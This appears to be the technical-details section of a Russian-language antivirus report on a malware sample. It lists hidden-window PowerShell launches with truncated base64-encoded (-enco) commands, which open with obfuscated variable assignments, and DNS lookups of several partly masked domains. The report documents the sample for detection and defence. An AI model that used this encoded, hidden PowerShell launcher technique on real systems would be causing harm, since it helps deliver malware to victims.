Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -enco PAAjACAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBpAGMAcgBvAHMAbwBmAHQALgBjAG8AbQAvACAAIwA+ACAAJABDAGgAZQBjAGsAaQBuAGcAXwBBAGMAYwBvAHUAbgB0AHEAdwBpAD0AJwBEAGUAdgBlAGwAbwBwAGUAcgB0AGsAbgAnADsAJAB...
- DNS ASK co######eatre-anglais.com
- DNS ASK no####bdesigns.com
- DNS ASK gr###cemx.com
- DNS ASK dy#####stribuidora.com
- DNS ASK me#####ereocalca.net
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -enco PAAjACAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBpAGMAcgBvAHMAbwBmAHQALgBjAG8AbQAvACAAIwA+ACAAJABDAGgAZQBjAGsAaQBuAGcAXwBBAGMAYwBvAHUAbgB0AHEAdwBpAD0AJwBEAGUAdgBlAGwAbwBwAGUAcgB0AGsAbgAnADsAJAB...' (со скрытым окном)